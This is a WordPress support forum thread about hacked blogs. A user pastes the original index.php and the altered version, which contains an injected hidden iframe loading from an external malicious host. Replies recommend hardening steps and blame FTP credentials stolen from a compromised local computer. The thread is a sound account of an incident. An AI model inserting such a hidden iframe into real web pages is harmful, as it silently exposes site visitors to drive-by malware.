Forums

WordPress › Support » How-To and Troubleshooting

Website hack (4 posts)

  1. nazcar
    Member
    Posted 2 years ago #

    Two of my wordpress self hosted blogs were hacked. The index.php file was altered. Did anyone experience this?

    Original:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-
<iframe src="http://u1w.in:8080/ts/in.cgi?pepsi112" width=125 height=125 style="visibility: hidden"></iframe>

    My blogs are working fine now.
    How to increase the security so it wont be altered/hacked again?
    My previous permission was 644 then I changed it now to 444.

  2. Samuel B
    moderator
    Posted 2 years ago #

    http://codex.wordpress.org/Hardening_WordPress

  3. nazcar
    Member
    Posted 2 years ago #

    thanks. the reason i am not upgrading is because of my plugins are not updated or may not be supported in the latest wp update. I guess I'll sacrifice those plugins for now because of these attacks.

  4. UseShots
    Member
    Posted 2 years ago #

    Hardening WordPress is a good this. Unfortunately, it won't help in this particular case.

    This iframe is injected using FTP credential stolen from your local computer.

    So make sure to scan your computer for malware.
    Once you are sure your computer is clean, change FTP passwords.
    And don't save passwords inside your FTP program if you don't want them to be stolen again.

    Here you can find more information about this attack:
    http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags